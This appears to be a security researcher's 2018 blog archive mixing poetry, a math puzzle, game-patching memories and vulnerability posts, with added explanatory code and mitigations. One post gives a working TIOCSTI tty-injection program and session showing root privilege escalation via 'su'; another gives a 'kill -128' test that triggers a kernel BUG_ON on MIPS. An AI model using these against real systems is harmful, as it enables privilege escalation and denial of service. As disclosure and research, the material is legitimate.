Fri Dec 7 15:04:34 EET 2018

Поезия (1) / Poetry (1)

Wear your new clothes, boys,
we fall as we walk,
we die as we sleep.
The questions of this planet
we may solve,
we may not solve...

But don't say: tomorrow we will be beautiful.
Don't say: tomorrow we will be happy.
Don't say: tomorrow we will be, we will be...
We will love tomorrow,
tomorrow I will be loved.
Wear your new clothes, boys,
we fall as we walk,
we die as we sleep.

Don't say: tomorrow we will start the big thing,
today let's earn money for our bread.
Don't say: tomorrow let's be honest,
today we will quietly
slip through...
Wear your new clothes, boys,
walking we fall,
dreaming we die.

Don't say: tomorrow with a shout in the square
I will tell the truth, and then to the stake!
To the stake, but tomorrow. Today bear with it,
today we have
to keep silent...
Wear your new clothes, boys,
we fall as we walk,
we die as we sleep!

Стефан Цанев (Stefan Tsanev)


====

Verse is born not of happiness or of non-involvement,
it is born of pain.
But how much?
As with any anaesthesia,
what matters is the dose.

Дамян Дамянов (Damyan Damyanov)

(Rough translation from the Bulgarian.)

Posted by blah | Permanent link

Mon Sep 24 16:14:26 EEST 2018

Math challenge of the day 2018-09-24


For complex $x$ define

$f(x) = \exp(x^2) - \exp(x) - 1$

Is it true that $f(5\pi i) = 0$?

We have strong numerical evidence at a precision of 100 decimal
digits, but some meromorphic doubts too ;)

gp/pari session (warning, gp is very buggy):

parisize = 8000000, primelimit = 500000, nbthreads = 2
? \p 100
   realprecision = 115 significant digits (100 digits displayed)
? f(x)=exp(x^2)-exp(x)-1
%1 = (x)->exp(x^2)-exp(x)-1
? f(5*I*Pi)
%2 = 6.952351934431877974 E-108 + 0.E-114*I
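The closed form, as an added worked derivation that is not part of the
original post, shows what the 100-digit run cannot: the value is a
positive constant that merely sits far below the displayed precision.

$$x = 5\pi i, \qquad x^2 = -25\pi^2, \qquad e^{x} = \cos 5\pi + i\sin 5\pi = -1,$$

$$f(5\pi i) = e^{-25\pi^2} - (-1) - 1 = e^{-25\pi^2} \approx 6.95 \times 10^{-108} \neq 0.$$

This matches the real part of %2 above, and the imaginary part is
exactly 0 because both $e^{x^2}$ and $e^{x}$ are real at this point.
A numerical zero at 100 digits is therefore not evidence that
$f(5\pi i) = 0$, only that $|f(5\pi i)| < 10^{-100}$.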

Cheers for the day.

Posted by cheers | Permanent link

Sat Sep 8 15:43:51 EEST 2018

On immortality in computer games


When I was younger, so much younger than today, I played computer
games in an unorthodox way. Instead of playing a game as a user, I
changed the games so that the player was immortal, or more precisely
had an infinite number of lives.

In short the process was: analyze the code and change the features you
don't like, such as the game ending because of death. In some sense
this was immortality in the game.

From rough memory there were several types of immortality:

(1) Instant free rebirth, starting from the beginning of the level
(2) No way to die
and optionally
(3) Supernatural skills like passing through walls, including exiting
the screen on the right and reappearing on the left.

The hardware was the Правец 82 (Pravetz 82, the socialist clone of the
Apple II): 8-bit 6502 processor, about 64 KB of memory, including video
memory and ROM.
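As an added example of the kind of patch described above (written for
this page; it is not code from the post or from any actual game): a
hand-assembled toy 6502 "game" with a lives counter, a tiny interpreter
for the six opcodes it uses, and the immortality patch of type (2) that
replaces the DEC of the lives counter with NOPs. The opcodes are real
6502 encodings; the game itself, its load address and the zero-page
address of the lives counter are invented for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LOAD_ADDR 0x0800   /* hypothetical load address of the game */
#define LIVES_ZP  0x10     /* hypothetical zero-page cell holding the lives */
#define DEATH_PC  0x0804   /* address of the "player died" handler below */

/* Constructed game, hand-assembled (real 6502 encodings):
 *   0800: A9 03   LDA #$03    ; three lives
 *   0802: 85 10   STA $10     ; lives = 3
 *   0804: C6 10   DEC $10     ; player died: lives -= 1   <- patch target
 *   0806: D0 FC   BNE $0804   ; lives != 0: play (and die) again
 *   0808: 00      BRK         ; lives == 0: game over                    */
static const uint8_t game[] = {
    0xA9, 0x03, 0x85, 0x10, 0xC6, 0x10, 0xD0, 0xFC, 0x00
};

/* Byte length of each opcode the toy interpreter understands, 0 if unknown. */
static int insn_len(uint8_t op)
{
    switch (op) {
    case 0xA9: case 0x85: case 0xC6: case 0xD0: return 2;
    case 0xEA: case 0x00: return 1;
    default: return 0;
    }
}

/* Execute code loaded at LOAD_ADDR.  Returns how many times the death
 * handler ran before BRK (game over), -1 if the player survived more
 * than max_deaths deaths (immortal), -2 on an unsupported opcode. */
int run_game(const uint8_t *code, size_t len, int max_deaths)
{
    static uint8_t mem[0x10000];
    memset(mem, 0, sizeof mem);
    memcpy(mem + LOAD_ADDR, code, len);
    uint16_t pc = LOAD_ADDR;
    uint8_t a = 0;
    int zero = 0, deaths = 0;

    for (;;) {
        if (pc == DEATH_PC && ++deaths > max_deaths)
            return -1;
        uint8_t op = mem[pc];
        uint8_t arg = mem[(uint16_t)(pc + 1)];
        switch (op) {
        case 0xA9: a = arg; zero = (a == 0); pc += 2; break;            /* LDA #imm */
        case 0x85: mem[arg] = a; pc += 2; break;                         /* STA zp   */
        case 0xC6: mem[arg]--; zero = (mem[arg] == 0); pc += 2; break;   /* DEC zp   */
        case 0xEA: pc += 1; break;                                       /* NOP      */
        case 0xD0: pc += 2; if (!zero) pc += (int8_t)arg; break;         /* BNE rel  */
        case 0x00: return deaths;                                        /* BRK      */
        default:   return -2;
        }
    }
}

/* Replace every `DEC LIVES` with two NOPs, walking the instruction stream
 * by opcode length so an operand byte that happens to be C6 is not
 * mistaken for an opcode.  Returns the number of sites patched, or -1 if
 * the walker meets an opcode it cannot size. */
int patch_immortal(uint8_t *code, size_t len, uint8_t lives_zp)
{
    int patched = 0;
    for (size_t i = 0; i < len; ) {
        int n = insn_len(code[i]);
        if (n == 0)
            return -1;
        if (code[i] == 0xC6 && i + 1 < len && code[i + 1] == lives_zp) {
            code[i] = 0xEA;
            code[i + 1] = 0xEA;
            patched++;
        }
        i += n;
    }
    return patched;
}

/* Patch a copy of the constructed game and check that it never ends.
 * Returns 1 when exactly one site was patched and the player survives. */
int patched_survives(void)
{
    uint8_t copy[sizeof game];
    memcpy(copy, game, sizeof copy);
    return patch_immortal(copy, sizeof copy, LIVES_ZP) == 1
        && run_game(copy, sizeof copy, 10) == -1;
}

int main(void)
{
    printf("original: game over after %d deaths\n",
           run_game(game, sizeof game, 10));
    printf("patched:  %s\n", patched_survives() ? "immortal" : "still dies");
    return 0;
}
```

The walk by instruction length is the part that matters on a real
binary: a raw search for the byte pair C6 10 will also hit operands and
data that merely look like the instruction, and patching those corrupts
the game instead of the death handler.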

My "customers" were my father's colleagues, engineers and professors.
They reached the end of a patched game and the game told them: "You are
very skilled and win a monetary award, call #american number". They
didn't call, partly because the game was pirated.

Similar stuff appears in science fiction. 

Implementing this in the Internet of Things will make a great mess; it
is just a matter of time.


Posted by Game Immortality Inc. | Permanent link

Sun Jul 1 19:00:40 EEST 2018

coverity scan of qmail -- 53 potential defects (with false positives)


Coverity is a commercial static source code analyzer that accepts some
open source projects for free.

I did a scan of djb's qmail; the results are at:

https://scan.coverity.com/projects/qmail

The tool reported only 53 defects. A quick look suggests that the
non-false positives are logically dead code or file race conditions
(I might be wrong about this).

To access the defects you will need a Coverity account (free,
captchas).

djb is giving a monetary bounty for qmail, and owes me a bounty he
couldn't reproduce because of lack of virtual memory on old FreeBSD ;)


Posted by djb owes me a bounty | Permanent link

Sat Jun 30 09:19:47 EEST 2018

BUG_ON() on mips kernels 4.17.2 and earlier (old but alive)

This is old but alive.

On MIPS kernels 4.17.2 and earlier an unprivileged user can trigger
BUG_ON(), possibly causing denial of service on the whole machine.

Suggested patches from 2013 are in the thread at:
https://www.spinics.net/lists/mips/msg73398.html

In 4.17.2, ./kernel/exit.c:

do_group_exit(int exit_code)
{
        struct signal_struct *sig = current->signal;

        BUG_ON(exit_code & 0x80);

|do_group_exit| is called from

./kernel/signal.c:2482:         do_group_exit(ksig->info.si_signo);

It appears to me that si_signo can be 0x80 (128 in decimal) because of:

arch/mips/include/uapi/asm/signal.h:15:#define _NSIG            128

On MIPS 128 is therefore a legal signal number, and when it is delivered
with its default (terminating) action the signal number is passed as the
exit code. 128 is exactly 0x80, the bit that BUG_ON() rejects (in an
exit code that bit is the core-dump flag, which is why the check exists).

A probable test case:
$ kill -128 `pidof program`


Posted by BUG ON | Permanent link

Wed Jun 13 12:25:34 EEST 2018

Ancient "su - hostile" vulnerability in debian 8 and 9

Just FYI.

Warning: this is rather old, known since at least 2005 and probably
much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: doing "su - hostile" on debian 8 and 9 may lead to root
privilege escalation. The default "sudo -u" is probably affected too.

Per chat with some admins, they use su - user.

Session:

root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c 
/*
 *
 * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
 * */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>

/* Push one byte into the input queue of the tty on fd 0, as if it had
 * been typed there.  After "su - guest4" and "exit" that tty is still
 * root's shell's terminal. */
void stackchar(char c)
{
  if (ioctl(0, TIOCSTI, &c) < 0) {
    perror("ioctl");
    exit(1);
  }
}

/* Each argument is injected as one line, so "./a.out id" types "id\n". */
int main(int argc, char *argv[])
{
  int i, j;
  char c;

  for (i = 1; i < argc; i++) {
    for (j=0; (c = argv[i][j]); j++) {
      stackchar(c);
    }
    stackchar('\n');
  }
  exit(0);
}

Posted by su do we | Permanent link

Tue Jun 12 12:51:05 EEST 2018

Are `su user' and/or `sudo -u user sh' considered dangerous?

Per vague memory I discussed half of this with some linux crowd and
they said "won't fix" long ago.

`su user' and `sudo -u user sh' give the user the fd of root's tty,
and it is readable and writable. After closing the session the user
can keep it and, on root's tty, potentially:

1. inject keypresses via ioctl()
and/or
2. read what is typed on root's tty (a second reader on the same tty
competes with root's shell for the input), probably with some
analogue of tee(1).

Is this really a concern?

Any workarounds?
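This question and the "su - hostile" session in the post above come
down to one root cause: su runs the child on the caller's tty, so the
child keeps a usable descriptor to that tty after the session ends. One
workaround is to run the child on a fresh pseudo-terminal instead, which
is what util-linux's su --pty (util-linux 2.33) and sudo's "Defaults
use_pty" do. The program below is an added example written for this
page; it is not code from either post and not the implementation of
either tool. It allocates a pty with posix_openpt(3), starts the command
in its own session with that pty as controlling terminal, and relays the
command's terminal output to the caller; the command run in the demo is
chosen for illustration. Linux semantics are assumed: opening a tty
after setsid() makes it the controlling terminal.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv on a newly allocated pty.  Whatever the child writes to its
 * terminal is copied into out (NUL-terminated, truncated to outlen-1
 * bytes).  Returns the child's exit status, or -1 on error.  The child
 * never sees the caller's terminal: the only tty it can keep after
 * "exit" is the throwaway slave, and TIOCSTI on that injects into an
 * input queue nobody reads. */
int run_on_fresh_pty(char *const argv[], char *out, size_t outlen)
{
    if (outlen == 0)
        return -1;
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0)
        return -1;
    const char *slave_name = ptsname(master);
    if (slave_name == NULL)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        setsid();                              /* new session, no ctty yet */
        int slave = open(slave_name, O_RDWR);  /* becomes the ctty (Linux) */
        if (slave < 0)
            _exit(127);
        dup2(slave, STDIN_FILENO);
        dup2(slave, STDOUT_FILENO);
        dup2(slave, STDERR_FILENO);
        if (slave > STDERR_FILENO)
            close(slave);
        close(master);                         /* the master side stays ours */
        execvp(argv[0], argv);
        _exit(127);
    }

    /* Relay the child's terminal output until the slave side is closed;
     * on Linux a read on the master then fails with EIO. */
    size_t used = 0;
    for (;;) {
        char buf[512];
        ssize_t n = read(master, buf, sizeof buf);
        if (n <= 0)
            break;
        size_t room = (used + 1 < outlen) ? outlen - used - 1 : 0;
        size_t take = ((size_t)n < room) ? (size_t)n : room;
        memcpy(out + used, buf, take);
        used += take;
    }
    out[used] = '\0';
    close(master);

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check: a shell on the fresh pty prints to its terminal and exits
 * with a chosen status; both must come back.  Returns 1 on success. */
int fresh_pty_demo(void)
{
    char out[256];
    char *const argv[] = {"sh", "-c", "echo hello; exit 3", NULL};
    int status = run_on_fresh_pty(argv, out, sizeof out);
    return status == 3 && strncmp(out, "hello", 5) == 0;
}

int main(void)
{
    char out[256];
    char *const argv[] = {"sh", "-c", "tty", NULL};
    int status = run_on_fresh_pty(argv, out, sizeof out);
    printf("child ran on %s(exit %d)\n", out, status);   /* a different /dev/pts than ours */
    return fresh_pty_demo() ? 0 : 1;
}
```

This only relays output; a usable su replacement also forwards the
caller's keyboard input and window size to the master side and
propagates signals, which is the bulk of what the real --pty code does.
Since Linux 6.2 TIOCSTI can also be disabled outright with the
dev.tty.legacy_tiocsti sysctl (CONFIG_LEGACY_TIOCSTI); that closes the
injection half of the problem but not the read half, while the fresh pty
closes both.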


Posted by sudo su - root | Permanent link

Wed Jun 6 16:20:52 EEST 2018

Near death experience

Near death experience

Long ago I lost consciousness. According to the doctors' logs I had
been very close to death. To my surprise I have memories of this time:
flying in a tunnel with very strange lights, and everything was super
calm. I never saw such lights, even in computer games. The closest to
one of the lights is the light of an eye examination, with a light
source and widened pupils.

Wikipedia has a page "Near-death experience". Looks like establishment
science has some interest in this stuff, lol.

Posted by nde | Permanent link

Thu May 31 16:18:27 EEST 2018

joke 2018-05-31

What is your sexual fantasy?
He dies during sex and leaves me $150M USD

Posted by joke | Permanent link

Mon May 28 13:55:32 EEST 2018

Stories from the past: the qmail-smtpd on freebsd exploit


The qmail-smtpd exploit on FreeBSD is probably the most braggable
of my exploits. The advisory is at [1] and is rather short.
I don't remember whether it is so because of "if it was hard to write, it must be
hard to understand".

I don't like this exploit much; the *BSD kernel stuff is better IMHO.

The provably exploitable part of the advisory is:
---
char *p;
int i; /*XXX signed int*/
...
p[i]=0;
---

In case $i$ is negative, this is an out-of-bounds write. It is not
an integer overflow, more like memory corruption.
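As an added illustration of those three lines (written for this page
and reconstructed from the advisory's shape; it is not qmail's actual
code): the unchecked write next to a bounds-checked version, plus one
common way an int index ends up negative, a byte count that passes
INT_MAX. The buffer sizes and values are constructed for the demo.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

/* One way i turns negative: a byte count kept in an int.  Past INT_MAX
 * (2 GB) the stored value wraps to a large negative number on every
 * mainstream two's-complement target.  That kind of counter is the
 * picture the 20GB-of-virtual-memory figure in the post fits. */
int count_as_int(unsigned long nbytes)
{
    return (int)nbytes;
}

/* The vulnerable shape.  Nothing relates i to the size of p, so a
 * negative i writes before the buffer and a too-large i after it.
 * (Only called with an in-range index in this file; with i < 0 it is
 * the memory corruption the advisory describes.) */
void terminate_unchecked(char *p, int i)
{
    p[i] = 0;
}

/* Hardened: the index is unsigned, the bound is explicit, and the
 * caller gets a failure instead of silent corruption.  A negative int
 * that arrives here through a (size_t) conversion becomes a huge index
 * and is refused by the same comparison. */
int terminate_checked(char *p, size_t plen, size_t i)
{
    if (i >= plen)
        return -1;
    p[i] = 0;
    return 0;
}

/* Drive both versions with the index the wrapped counter produces.
 * Returns 1 if the checked version refused the wrapped index and
 * accepted the last in-range one. */
int index_demo(void)
{
    char buf[16];
    int wrapped = count_as_int(2147483648UL);               /* INT_MAX + 1 */
    int refused = terminate_checked(buf, sizeof buf, (size_t)wrapped) == -1;
    int ok = terminate_checked(buf, sizeof buf, sizeof buf - 1) == 0 && buf[15] == 0;
    terminate_unchecked(buf, 3);                            /* 3 is in range */
    return wrapped < 0 && refused && ok && buf[3] == 0;
}

int main(void)
{
    printf("INT_MAX + 1 as int: %d\n", count_as_int(2147483648UL));
    printf("checked write with wrapped index refused: %s\n",
           index_demo() ? "yes" : "no");
    return 0;
}
```

The fix that matters is the second one: a bounds check against the
buffer's real size. Switching the index to size_t alone turns a
negative write into a huge positive one, which the check then refuses,
but it does not by itself stop a counter from wrapping.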

The process of discovery was rational [^2] dirty labour:
1. analyze
2. test
3. in case of failure (almost surely it fails) repeat
4. return SUCCESS

The process took _long_. I temporarily gave up several times, until I
pressed the lucky keys.

Exploitability required about 20GB of virtual memory.

djb basically replied: "This is not a bug, this is a feature. Nobody gives so
much virtual memory to qmail".

The strongest counterclaims to djb's answer are:
1. The installation instructions don't mention limits
2. In the future libc alone can become larger than the limits

[1] http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
[^2]: in math irrational and transcendental stuff are more interesting
than rational stuff.


Posted by qmail-smtpd | Permanent link